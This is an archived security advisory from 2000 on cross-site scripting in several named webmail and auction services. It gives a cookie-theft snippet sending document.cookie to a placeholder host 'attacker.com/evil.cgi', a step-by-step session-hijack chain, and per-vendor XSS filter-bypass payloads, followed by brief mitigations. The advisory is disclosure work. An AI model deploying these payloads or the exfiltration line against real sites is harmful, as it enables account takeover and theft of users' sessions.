COMMAND
javascript
SYSTEMS AFFECTED
Web Applications
PROBLEM
'D-Krypt' found following. Results show that Microsoft Hotmail,
Excite, Altavista, E-Bay, Lycos Netscape WebMail, E-Trade,
Infoseek/Go.com and their users are all currently vulnerable to
web based attack.
The following report is the result of a two hour security survey
of high profile webmail and auction services offered free over
the internet. This survey is in no way extensive or thorough. It
serves only as "proof of concept" that these types of services are
vulnerable to attack on a wide scale. All the following
vulnerabilities are currently active as of Aug. 25, 2000.
Please note that the following vulnerabilities are NOT new and
have been posted publicly for weeks if not months either numerous
people.
The following webmail vulnerabilities all stem from the same
problem. The attacker has the ability to pass unfiltered
malicious HTML/JavaScript into the target users web environment.
This means that the attacker can write code and send to the user
to be then executed on the client side. Whatever is within the
reach of javascript access, now the attacker is also able to
access remotely. What sensitive things does javascript/the
attacker have access to within the browser?
1) Browser Cookies
2) Document Location
3) Browser and System Settings
4) Client Host Network Information
The above are the most prominent and sensitive information
contained.
The focus of the following vulnerabilities only apply to #1
(Browser Cookies). Most if not all webmail services use cookie
data for authentication. If the attacker were to compromise the
cookie data of the user, the account can now be accessed.
Simply, if the attacker can pilfer the cookie data, they can
substitute that cookie into their own browser and authenticate
without the knowledge of a username/password being necessary.
Thus the attacker has become the target user until the session
runs out. Variants may be required to achieve maximum results.
Remember, this is only proof of concept.
Also worth mention is that the attacker may use any browser
specific vulnerabilites requiring the use of JavaScript. Such
vulnerabilities as browser cache exploits, history exploits, and
others.
How does the attacker bypass browser cookie security to move the
cookie data off the intended cookie domain to another? Good
question.
Let's say that the attacker is able to execute arbitrary
HTML/JavaScript on the target user's machine. We now know the
javascript has access to the cookie strings on the executed
domain. The attacker using javascript can issue a "GET" request,
say though the use of an "IMG" tag or webpage request, appending
the cookie string to the end of the request.
<SCRIPT>
document.sender.src = "http://www.attacker.com/evil.cgi/" +
document.cookie;
</SCRIPT>
<IMG NAME=sender SRC="some_image.gif">
which in essence becomes:
<IMG NAME=sender SRC="http://www.attacker.com/evil.cgi/users_cookie_data">
Making it even harder to detect, a 1 pixel by 1 pixel image would
also work. This can all happen quickly on the fly with javascript
in many varying ways.
The rest of the document relies on this principal flaw. If an
attacker can cause the user to view unrestricted arbitrary
HTML/JavaScript within their environment, the account is
vulnerable. This is the general premise.
To summarize lets follow the chain of events.
1) Attacker sends a crafted HTML/Javascript email to his
target.
2) User signs into whatever service and is assigned an
authentication cookie.
3) User reads attacker's email.
4) User's Cookie is secretly sent to attackers CGI via an
invisible GET request.
5) User continues on, never being the wiser.
6) Attacker checks his CGI logs and finds the cookie string.
7) Attacker places the victims cookie in his/her own cookie
file
8) Logs onto service with users account.
Simple.
The following companies were not picked by any other method other
than that they have free webmail or auction services and a large
user base.
Microsoft Hotmail http://www.hotmail.com/
Excite Mail http://inbox.excite.com/
Altavista Mail http://www.altavista.com/
E-Bay Chat Forums http://www.ebay.com/
Lycos http://comm.lycos.com/
Netscape WebMail http://home.netscape.com/webmail/index-f.html
E-Trade Mail http://www.etrade.com
Infoseek/Go.com http://register.go.com/
Anyone on the list not mentioned does not mean that they are not
vulnerable. Only that they havent been looked at.
All the following vulnerabilities rely on sending HTML Mail to
target user. The following information is for example purposes
only and not a complete account compromise (not required for point
demonstration). All that is shown is that the embedded JavaScript
code will use an alert dialog window to display cookie data to the
user. Anything you do to go further with the exploitation is of
your own accord.
******EXAMPLE******
MIME-Version: 1.0
From: hacker <reason@mindless.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: The Example
<HTML><BODY>
INSERT EXPLOIT HERE
</BODY></HTML>
.
*******************
=======================================================================
Microsoft Hotmail
Vulnerable to: "HTML Entity"
Exploit:
<!-- REMOVE THE OFFENDING SLASH -->
<IMG SRC="javas&\#09;cript:alert(document.cookie);">
=======================================================================
Excite Mail
Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"
Exploit:
<IMG SRC="j
avascr
ipt:ale
rt(document.cookie);">
=======================================================================
Altavista
Vulnerable to: "HTML Entity"
Exploit:
<!-- REMOVE THE OFFENDING SLASH -->
<IMG SRC="javas&\#09;cript:alert(document.cookie);">
=======================================================================
E-Bay Chat Forums
Vulnerable to: "IMG SRC JavaScript Execute"
Exploit:
<IMG SRC="javascript:alert(document.cookie);">
=======================================================================
Lycos/MailCity
Vulnerable to: "STYLE TYPE JavaScript"
Exploit:
<style TYPE="text/javascript">
alert(document.cookie);
</style>
=======================================================================
Netscape WebMail (netscape.net)
Vulnerable to: "STYLE TYPE JavaScript"
Exploit:
<style TYPE="text/javascript">
alert(document.cookie);
</style>
=======================================================================
E-Trade FreeMail
Vulnerable to: "STYLE TYPE JavaScript"
Exploit:
<IMG SRC="livescript:alert(document.cookie);">
=======================================================================
Infoseek/Go Network Mail
Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"
Exploit:
<IMG SRC="j
avascr
ipt:ale
rt(document.cookie);">
=======================================================================
SOLUTION
Vendor: Filter for known JavaScript strings and disallow them from
entering the users envirornment.
User: Turn off JavaScript until fix has been implamented by
vendor.